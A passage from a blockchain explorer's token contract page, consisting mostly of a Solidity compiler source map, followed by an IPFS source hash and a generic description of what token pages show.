;;13140:366;;;:::o;13512:::-;13654:3;13675:67;13739:2;13734:3;13675:67;:::i;:::-;13668:74;;13751:93;13840:3;13751:93;:::i;:::-;13869:2;13864:3;13860:12;13853:19;;13512:366;;;:::o;13884:::-;14026:3;14047:67;14111:2;14106:3;14047:67;:::i;:::-;14040:74;;14123:93;14212:3;14123:93;:::i;:::-;14241:2;14236:3;14232:12;14225:19;;13884:366;;;:::o;14256:::-;14398:3;14419:67;14483:2;14478:3;14419:67;:::i;:::-;14412:74;;14495:93;14584:3;14495:93;:::i;:::-;14613:2;14608:3;14604:12;14597:19;;14256:366;;;:::o;14628:::-;14770:3;14791:67;14855:2;14850:3;14791:67;:::i;:::-;14784:74;;14867:93;14956:3;14867:93;:::i;:::-;14985:2;14980:3;14976:12;14969:19;;14628:366;;;:::o;15000:398::-;15159:3;15180:83;15261:1;15256:3;15180:83;:::i;:::-;15173:90;;15272:93;15361:3;15272:93;:::i;:::-;15390:1;15385:3;15381:11;15374:18;;15000:398;;;:::o;15404:366::-;15546:3;15567:67;15631:2;15626:3;15567:67;:::i;:::-;15560:74;;15643:93;15732:3;15643:93;:::i;:::-;15761:2;15756:3;15752:12;15745:19;;15404:366;;;:::o;15776:::-;15918:3;15939:67;16003:2;15998:3;15939:67;:::i;:::-;15932:74;;16015:93;16104:3;16015:93;:::i;:::-;16133:2;16128:3;16124:12;16117:19;;15776:366;;;:::o;16148:::-;16290:3;16311:67;16375:2;16370:3;16311:67;:::i;:::-;16304:74;;16387:93;16476:3;16387:93;:::i;:::-;16505:2;16500:3;16496:12;16489:19;;16148:366;;;:::o;16520:118::-;16607:24;16625:5;16607:24;:::i;:::-;16602:3;16595:37;16520:118;;:::o;16644:583::-;16866:3;16888:92;16976:3;16967:6;16888:92;:::i;:::-;16881:99;;16997:95;17088:3;17079:6;16997:95;:::i;:::-;16990:102;;17109:92;17197:3;17188:6;17109:92;:::i;:::-;17102:99;;17218:3;17211:10;;16644:583;;;;;;:::o;17233:379::-;17417:3;17439:147;17582:3;17439:147;:::i;:::-;17432:154;;17603:3;17596:10;;17233:379;;;:::o;17618:222::-;17711:4;17749:2;17738:9;17734:18;17726:26;;17762:71;17830:1;17819:9;17815:17;17806:6;17762:71;:::i;:::-;17618:222;;;;:::o;17846:640::-;18041:4;18079:3;18068:9;18064:19;18056:27;;18093:71;18161:1;18150:9;18146:17;18137:6;18093:71;:::i;:::-;18174:72;18242:2;18231:9;18227:18;18218:6;18174:72;:::i;:::-;18256;18324:2;18313:9;18309:18;18300:6;18256:72;:::i;:::-;18375:9;18369:4;18365:20;18360:2;18349:9;18345:18;18338:48;18403:76;18474:4;18465:6;18403:76;:::i;:::-;18395:84;;17846:640;;;;;;;:::o;18492:210::-;18579:4;18617:2;18606:9;18602:18;18594:26;;18630:65;18692:1;18681:9;18677:17;18668:6;18630:65;:::i;:::-;18492:210;;;;:::o;18708:313::-;18821:4;18859:2;18848:9;18844:18;18836:26;;18908:9;18902:4;18898:20;18894:1;18883:9;18879:17;18872:47;18936:78;19009:4;19000:6;18936:78;:::i;:::-;18928:86;;18708:313;;;;:::o;19027:419::-;19193:4;19231:2;19220:9;19216:18;19208:26;;19280:9;19274:4;19270:20;19266:1;19255:9;19251:17;19244:47;19308:131;19434:4;19308:131;:::i;:::-;19300:139;;19027:419;;;:::o;19452:::-;19618:4;19656:2;19645:9;19641:18;19633:26;;19705:9;19699:4;19695:20;19691:1;19680:9;19676:17;19669:47;19733:131;19859:4;19733:131;:::i;:::-;19725:139;;19452:419;;;:::o;19877:::-;20043:4;20081:2;20070:9;20066:18;20058:26;;20130:9;20124:4;20120:20;20116:1;20105:9;20101:17;20094:47;20158:131;20284:4;20158:131;:::i;:::-;20150:139;;19877:419;;;:::o;20302:::-;20468:4;20506:2;20495:9;20491:18;20483:26;;20555:9;20549:4;20545:20;20541:1;20530:9;20526:17;20519:47;20583:131;20709:4;20583:131;:::i;:::-;20575:139;;20302:419;;;:::o;20727:::-;20893:4;20931:2;20920:9;20916:18;20908:26;;20980:9;20974:4;20970:20;20966:1;20955:9;20951:17;20944:47;21008:131;21134:4;21008:131;:::i;:::-;21000:139;;20727:419;;;:::o;21152:::-;21318:4;21356:2;21345:9;21341:18;21333:26;;21405:9;21399:4;21395:20;21391:1;21380:9;21376:17;21369:47;21433:131;21559:4;21433:131;:::i;:::-;21425:139;;21152:419;;;:::o;21577:::-;21743:4;21781:2;21770:9;21766:18;21758:26;;21830:9;21824:4;21820:20;21816:1;21805:9;21801:17;21794:47;21858:131;21984:4;21858:131;:::i;:::-;21850:139;;21577:419;;;:::o;22002:::-;22168:4;22206:2;22195:9;22191:18;22183:26;;22255:9;22249:4;22245:20;22241:1;22230:9;22226:17;22219:47;22283:131;22409:4;22283:131;:::i;:::-;22275:139;;22002:419;;;:::o;22427:::-;22593:4;22631:2;22620:9;22616:18;22608:26;;22680:9;22674:4;22670:20;22666:1;22655:9;22651:17;22644:47;22708:131;22834:4;22708:131;:::i;:::-;22700:139;;22427:419;;;:::o;22852:::-;23018:4;23056:2;23045:9;23041:18;23033:26;;23105:9;23099:4;23095:20;23091:1;23080:9;23076:17;23069:47;23133:131;23259:4;23133:131;:::i;:::-;23125:139;;22852:419;;;:::o;23277:::-;23443:4;23481:2;23470:9;23466:18;23458:26;;23530:9;23524:4;23520:20;23516:1;23505:9;23501:17;23494:47;23558:131;23684:4;23558:131;:::i;:::-;23550:139;;23277:419;;;:::o;23702:222::-;23795:4;23833:2;23822:9;23818:18;23810:26;;23846:71;23914:1;23903:9;23899:17;23890:6;23846:71;:::i;:::-;23702:222;;;;:::o;23930:129::-;23964:6;23991:20;;:::i;:::-;23981:30;;24020:33;24048:4;24040:6;24020:33;:::i;:::-;23930:129;;;:::o;24065:75::-;24098:6;24131:2;24125:9;24115:19;;24065:75;:::o;24146:311::-;24223:4;24313:18;24305:6;24302:30;24299:56;;;24335:18;;:::i;:::-;24299:56;24385:4;24377:6;24373:17;24365:25;;24445:4;24439;24435:15;24427:23;;24146:311;;;:::o;24463:307::-;24524:4;24614:18;24606:6;24603:30;24600:56;;;24636:18;;:::i;:::-;24600:56;24674:29;24696:6;24674:29;:::i;:::-;24666:37;;24758:4;24752;24748:15;24740:23;;24463:307;;;:::o;24776:308::-;24838:4;24928:18;24920:6;24917:30;24914:56;;;24950:18;;:::i;:::-;24914:56;24988:29;25010:6;24988:29;:::i;:::-;24980:37;;25072:4;25066;25062:15;25054:23;;24776:308;;;:::o;25090:141::-;25139:4;25162:3;25154:11;;25185:3;25182:1;25175:14;25219:4;25216:1;25206:18;25198:26;;25090:141;;;:::o;25237:98::-;25288:6;25322:5;25316:12;25306:22;;25237:98;;;:::o;25341:99::-;25393:6;25427:5;25421:12;25411:22;;25341:99;;;:::o;25446:168::-;25529:11;25563:6;25558:3;25551:19;25603:4;25598:3;25594:14;25579:29;;25446:168;;;;:::o;25620:147::-;25721:11;25758:3;25743:18;;25620:147;;;;:::o;25773:169::-;25857:11;25891:6;25886:3;25879:19;25931:4;25926:3;25922:14;25907:29;;25773:169;;;;:::o;25948:148::-;26050:11;26087:3;26072:18;;25948:148;;;;:::o;26102:305::-;26142:3;26161:20;26179:1;26161:20;:::i;:::-;26156:25;;26195:20;26213:1;26195:20;:::i;:::-;26190:25;;26349:1;26281:66;26277:74;26274:1;26271:81;26268:107;;;26355:18;;:::i;:::-;26268:107;26399:1;26396;26392:9;26385:16;;26102:305;;;;:::o;26413:185::-;26453:1;26470:20;26488:1;26470:20;:::i;:::-;26465:25;;26504:20;26522:1;26504:20;:::i;:::-;26499:25;;26543:1;26533:35;;26548:18;;:::i;:::-;26533:35;26590:1;26587;26583:9;26578:14;;26413:185;;;;:::o;26604:348::-;26644:7;26667:20;26685:1;26667:20;:::i;:::-;26662:25;;26701:20;26719:1;26701:20;:::i;:::-;26696:25;;26889:1;26821:66;26817:74;26814:1;26811:81;26806:1;26799:9;26792:17;26788:105;26785:131;;;26896:18;;:::i;:::-;26785:131;26944:1;26941;26937:9;26926:20;;26604:348;;;;:::o;26958:191::-;26998:4;27018:20;27036:1;27018:20;:::i;:::-;27013:25;;27052:20;27070:1;27052:20;:::i;:::-;27047:25;;27091:1;27088;27085:8;27082:34;;;27096:18;;:::i;:::-;27082:34;27141:1;27138;27134:9;27126:17;;26958:191;;;;:::o;27155:96::-;27192:7;27221:24;27239:5;27221:24;:::i;:::-;27210:35;;27155:96;;;:::o;27257:90::-;27291:7;27334:5;27327:13;27320:21;27309:32;;27257:90;;;:::o;27353:149::-;27389:7;27429:66;27422:5;27418:78;27407:89;;27353:149;;;:::o;27508:125::-;27574:7;27603:24;27621:5;27603:24;:::i;:::-;27592:35;;27508:125;;;:::o;27639:126::-;27676:7;27716:42;27709:5;27705:54;27694:65;;27639:126;;;:::o;27771:77::-;27808:7;27837:5;27826:16;;27771:77;;;:::o;27854:154::-;27938:6;27933:3;27928;27915:30;28000:1;27991:6;27986:3;27982:16;27975:27;27854:154;;;:::o;28014:307::-;28082:1;28092:113;28106:6;28103:1;28100:13;28092:113;;;28191:1;28186:3;28182:11;28176:18;28172:1;28167:3;28163:11;28156:39;28128:2;28125:1;28121:10;28116:15;;28092:113;;;28223:6;28220:1;28217:13;28214:101;;;28303:1;28294:6;28289:3;28285:16;28278:27;28214:101;28063:258;28014:307;;;:::o;28327:320::-;28371:6;28408:1;28402:4;28398:12;28388:22;;28455:1;28449:4;28445:12;28476:18;28466:81;;28532:4;28524:6;28520:17;28510:27;;28466:81;28594:2;28586:6;28583:14;28563:18;28560:38;28557:84;;;28613:18;;:::i;:::-;28557:84;28378:269;28327:320;;;:::o;28653:281::-;28736:27;28758:4;28736:27;:::i;:::-;28728:6;28724:40;28866:6;28854:10;28851:22;28830:18;28818:10;28815:34;28812:62;28809:88;;;28877:18;;:::i;:::-;28809:88;28917:10;28913:2;28906:22;28696:238;28653:281;;:::o;28940:233::-;28979:3;29002:24;29020:5;29002:24;:::i;:::-;28993:33;;29048:66;29041:5;29038:77;29035:103;;;29118:18;;:::i;:::-;29035:103;29165:1;29158:5;29154:13;29147:20;;28940:233;;;:::o;29179:176::-;29211:1;29228:20;29246:1;29228:20;:::i;:::-;29223:25;;29262:20;29280:1;29262:20;:::i;:::-;29257:25;;29301:1;29291:35;;29306:18;;:::i;:::-;29291:35;29347:1;29344;29340:9;29335:14;;29179:176;;;;:::o;29361:180::-;29409:77;29406:1;29399:88;29506:4;29503:1;29496:15;29530:4;29527:1;29520:15;29547:180;29595:77;29592:1;29585:88;29692:4;29689:1;29682:15;29716:4;29713:1;29706:15;29733:180;29781:77;29778:1;29771:88;29878:4;29875:1;29868:15;29902:4;29899:1;29892:15;29919:180;29967:77;29964:1;29957:88;30064:4;30061:1;30054:15;30088:4;30085:1;30078:15;30105:180;30153:77;30150:1;30143:88;30250:4;30247:1;30240:15;30274:4;30271:1;30264:15;30291:117;30400:1;30397;30390:12;30414:117;30523:1;30520;30513:12;30537:117;30646:1;30643;30636:12;30660:117;30769:1;30766;30759:12;30783:117;30892:1;30889;30882:12;30906:102;30947:6;30998:2;30994:7;30989:2;30982:5;30978:14;30974:28;30964:38;;30906:102;;;:::o;31014:156::-;31154:8;31150:1;31142:6;31138:14;31131:32;31014:156;:::o;31176:225::-;31316:34;31312:1;31304:6;31300:14;31293:58;31385:8;31380:2;31372:6;31368:15;31361:33;31176:225;:::o;31407:160::-;31547:12;31543:1;31535:6;31531:14;31524:36;31407:160;:::o;31573:172::-;31713:24;31709:1;31701:6;31697:14;31690:48;31573:172;:::o;31751:::-;31891:24;31887:1;31879:6;31875:14;31868:48;31751:172;:::o;31929:171::-;32069:23;32065:1;32057:6;32053:14;32046:47;31929:171;:::o;32106:182::-;32246:34;32242:1;32234:6;32230:14;32223:58;32106:182;:::o;32294:172::-;32434:24;32430:1;32422:6;32418:14;32411:48;32294:172;:::o;32472:114::-;;:::o;32592:175::-;32732:27;32728:1;32720:6;32716:14;32709:51;32592:175;:::o;32773:164::-;32913:16;32909:1;32901:6;32897:14;32890:40;32773:164;:::o;32943:166::-;33083:18;33079:1;33071:6;33067:14;33060:42;32943:166;:::o;33115:122::-;33188:24;33206:5;33188:24;:::i;:::-;33181:5;33178:35;33168:63;;33227:1;33224;33217:12;33168:63;33115:122;:::o;33243:116::-;33313:21;33328:5;33313:21;:::i;:::-;33306:5;33303:32;33293:60;;33349:1;33346;33339:12;33293:60;33243:116;:::o;33365:120::-;33437:23;33454:5;33437:23;:::i;:::-;33430:5;33427:34;33417:62;;33475:1;33472;33465:12;33417:62;33365:120;:::o;33491:180::-;33593:53;33640:5;33593:53;:::i;:::-;33586:5;33583:64;33573:92;;33661:1;33658;33651:12;33573:92;33491:180;:::o;33677:122::-;33750:24;33768:5;33750:24;:::i;:::-;33743:5;33740:35;33730:63;;33789:1;33786;33779:12;33730:63;33677:122;:::o

Swarm Source

ipfs://df03e9c7f451c33daa0dcfd12ccaac56e5575ffa321b26845efd474e48a3affd
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.